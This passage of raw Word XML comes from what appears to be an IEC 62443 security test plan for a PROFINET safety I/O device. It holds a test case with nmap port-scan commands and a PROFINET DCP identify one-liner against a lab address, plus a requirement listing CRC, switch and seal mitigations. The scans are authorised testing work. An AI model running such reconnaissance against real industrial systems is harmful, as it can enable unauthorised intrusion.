                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43431F4C" w14:textId="77777777" w:rsidR="00DC4974" w:rsidRDefault="00DC4974"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DC4974" w14:paraId="26CE622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D5E15E" w14:textId="77777777" w:rsidR="00DC4974" w:rsidRDefault="00DC4974" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10339B02" w14:textId="3883E84C" w:rsidR="00DC4974" w:rsidRPr="002A51F8" w:rsidRDefault="00DC497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51F8">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ001-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DC4974" w14:paraId="079D00E5"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56971EE8" w14:textId="77777777" w:rsidR="00DC4974" w:rsidRDefault="00DC4974" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="347DD483" w14:textId="11B1E2AB" w:rsidR="00DC4974" w:rsidRPr="002A51F8" w:rsidRDefault="00DC4974"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xml:space="preserve">DUT IP set via DCP to 192.168.0.2; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AC3E10A" w14:textId="453F9D2E" w:rsidR="00DC4974" w:rsidRPr="002A51F8" w:rsidRDefault="00DC4974"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Pi eth0 = 192.168.0.100</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DC4974" w14:paraId="527D59F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816E0" w14:textId="77777777" w:rsidR="00DC4974" w:rsidRDefault="00DC4974" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A4C0C36" w14:textId="62E18942" w:rsidR="00DC4974" w:rsidRPr="002A51F8" w:rsidRDefault="00DC497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51F8">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Nmap (Pi) — per ifm CM-001; pnio_dcp for L2 identify</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DC4974" w:rsidRPr="00316EA1" w14:paraId="692DCDCB"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2DF15DBB" w14:textId="77777777" w:rsidR="00DC4974" w:rsidRDefault="00DC4974" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48EB52BB" w14:textId="77777777" w:rsidR="00DC4974" w:rsidRPr="002A51F8" w:rsidRDefault="00DC4974" w:rsidP="00DC497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TC-RQ001-04 Attack-surface enumeration (NIST SP 800-115 §4.2/4.3)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06D1BB4F" w14:textId="77777777" w:rsidR="00DC4974" w:rsidRPr="002A51F8" w:rsidRDefault="00DC4974" w:rsidP="00DC497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sudo nmap -sS -sV -p- -T3 -oA TC04_srio_tcp 192.168.0.2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="370B8457" w14:textId="77777777" w:rsidR="00DC4974" w:rsidRPr="002A51F8" w:rsidRDefault="00DC4974" w:rsidP="00DC497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sudo nmap -sU --top-ports 200 -oA TC04_srio_udp 192.168.0.2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FE0D1C0" w14:textId="77777777" w:rsidR="00DC4974" w:rsidRPr="002A51F8" w:rsidRDefault="00DC4974" w:rsidP="00DC497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Layer-2 PROFINET identity (no IP needed):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B997518" w14:textId="02F06C7B" w:rsidR="001E1D5E" w:rsidRPr="002A51F8" w:rsidRDefault="00DC4974" w:rsidP="00A22A3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python3 -c "import pnio_dcp; d=pnio_dcp.DCP('eth0'); print(d.identify_all())"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DC4974" w14:paraId="3EF9CF3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CC7CE" w14:textId="77777777" w:rsidR="00DC4974" w:rsidRDefault="00DC4974" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74CFD502" w14:textId="6019CABB" w:rsidR="00A22A33" w:rsidRPr="002A51F8" w:rsidRDefault="00A22A33"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51F8">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Expected: Open: HTTP :80 (IoT-Core), PROFINET/DCP L2. Closed/absent: 443 (HTTPS), 1883 (MQTT), WebSocket: consistent with SRIO-7906/7907 (no WebSocket/MQTT) and read-only IoT-Core</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E1A7F21" w14:textId="77777777" w:rsidR="00A22A33" w:rsidRPr="002A51F8" w:rsidRDefault="00A22A33"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p w14:paraId="3FC9E242" w14:textId="5C7E4FFF" w:rsidR="00DC4974" w:rsidRPr="002A51F8" w:rsidRDefault="00DC497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51F8">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail-___</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DC4974" w:rsidRPr="00316EA1" w14:paraId="73A4B35C"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108EAD79" w14:textId="77777777" w:rsidR="00DC4974" w:rsidRDefault="00DC4974" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CA1BB8B" w14:textId="41997F97" w:rsidR="00DC4974" w:rsidRPr="002A51F8" w:rsidRDefault="001E1D5E"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TC04_srio_tcp.xml/.nmap, TC04_srio_udp.xml, DCP identify log</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5BAEEFCF" w14:textId="77777777" w:rsidR="00DC4974" w:rsidRPr="00DC4974" w:rsidRDefault="00DC4974" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7326C14F" w14:textId="77777777" w:rsidR="00DC4974" w:rsidRPr="00DC4974" w:rsidRDefault="00DC4974" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="246B7EB4" w14:textId="77777777" w:rsidR="00DC4974" w:rsidRDefault="00DC4974" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CF271AB" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67BADC93" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="342FB14D" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D802843" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29EAB549" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EE87764" w14:textId="77777777" w:rsidR="00EC5383" w:rsidRDefault="00EC5383" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40E78C3A" w14:textId="77777777" w:rsidR="00EC5383" w:rsidRDefault="00EC5383" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="260C0B08" w14:textId="1D363E72" w:rsidR="00DB074F" w:rsidRDefault="00DB074F" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24DAF634" w14:textId="6BCCDFAF" w:rsidR="009C0A46" w:rsidRPr="00F51953" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C1714F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">REQUIREMENT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F23F82A"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21F4523B" w14:textId="760B44DB" w:rsidR="009C0A46" w:rsidRPr="00897779" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MVO-ID: </w:t>
      </w:r>
      <w:r w:rsidR="005900F0" w:rsidRPr="005900F0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RQ-002</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3503555C" w14:textId="1951AA5A" w:rsidR="009C0A46" w:rsidRPr="00897779" w:rsidRDefault="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00693D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVO Requirement Text:</w:t>
      </w:r>
      <w:r w:rsidRPr="00897779">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005900F0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="005900F0" w:rsidRPr="005900F0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>he system shall protect hardware components transmitting signal or data relevant to connection or access to safety-critical software against corruption, whether accidental or intentional.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEE7F8A" w14:textId="792117D8" w:rsidR="009C0A46" w:rsidRPr="00A031C9" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">IEC 62443-4-2 CR Mapping: </w:t>
      </w:r>
      <w:r w:rsidR="00A031C9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A031C9" w:rsidRPr="00A031C9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CR 3.1,</w:t>
      </w:r>
      <w:r w:rsidR="00D727D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CR 3.1 RE (1), </w:t>
      </w:r>
      <w:r w:rsidR="00A031C9" w:rsidRPr="00A031C9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00721ED9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">CR 3.4, </w:t>
      </w:r>
      <w:r w:rsidR="00A031C9" w:rsidRPr="00A031C9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EDR 3.11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679FB828" w14:textId="13A8E40B" w:rsidR="009C0A46" w:rsidRPr="00897779" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Target Assets: </w:t>
      </w:r>
      <w:r w:rsidR="00A031C9" w:rsidRPr="00A031C9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C (Transmitted Safety Frame), G (physical F-address interface)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7568CD5D" w14:textId="1D4A84BD" w:rsidR="009C0A46" w:rsidRDefault="00196EB6">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00196EB6">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">STRIDE: </w:t>
      </w:r>
      <w:r w:rsidR="007F5A7B" w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009C0A46" w:rsidRPr="00280EAE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AB010A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="0009084A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Spoofing,</w:t>
      </w:r>
      <w:r w:rsidR="00AB010A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="0009084A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A031C9" w:rsidRPr="00A031C9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tampering</w:t>
      </w:r>
      <w:r w:rsidR="009E5C94">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367E4521" w14:textId="77777777" w:rsidR="001C12A7" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Security Function (Mitigation):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D97B08" w14:textId="3E7A5A93" w:rsidR="00E63285" w:rsidRPr="00E63285" w:rsidRDefault="00E63285" w:rsidP="00E63285">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E63285">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4-byte CRC + CRC-Seed24/32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E63285">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Frame-level accidental-corruption detection (SRIO-2998).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2351A4E5" w14:textId="2789F8D5" w:rsidR="00E63285" w:rsidRPr="00E63285" w:rsidRDefault="00E63285" w:rsidP="00E63285">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E63285">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>iParCRC (UINT32) + F_ParCRC (UINT16)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E63285">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Parameter-transfer protection; a mismatch is rejected as EC3 (SRIO-2998, SRIO-8574/8575, SRIO-12627).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2FA782" w14:textId="29F2F9FD" w:rsidR="00E63285" w:rsidRPr="00E63285" w:rsidRDefault="00E63285" w:rsidP="00E63285">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E63285">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Certified CRC-Tool (T2, TÜV Süd)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E63285">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> iParCRC generated by an externally certified off-line tool (SRIO-9023).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5539D02F" w14:textId="47636EDB" w:rsidR="00E63285" w:rsidRPr="00E63285" w:rsidRDefault="00E63285" w:rsidP="00E63285">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E63285">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rotary switch read only at Init</w:t>
      </w:r>
      <w:r w:rsidR="00B22D12">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E63285">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> A runtime change of the F-address is ignored until reboot (SRIO-8803, SRIO-10812)</w:t>
      </w:r>
      <w:r w:rsidR="00B22D12">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E63285">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a temporal protection of the running safety function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08177409" w14:textId="4BEBE698" w:rsidR="00E63285" w:rsidRPr="00E63285" w:rsidRDefault="00E63285" w:rsidP="00E63285">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E63285">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Physical seals</w:t>
      </w:r>
      <w:r w:rsidR="00B22D12">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E63285">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Plastic/metal sleeve seals on the switch housing (SRIO-11000/11001)</w:t>
      </w:r>
      <w:r w:rsidR="00B22D12">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E63285">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>passive resistance only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57614F07" w14:textId="77777777" w:rsidR="00355D43" w:rsidRPr="00355D43" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Identified Gap: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63597285" w14:textId="66D2F824" w:rsidR="00355D43" w:rsidRPr="00C72723" w:rsidRDefault="00355D43">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
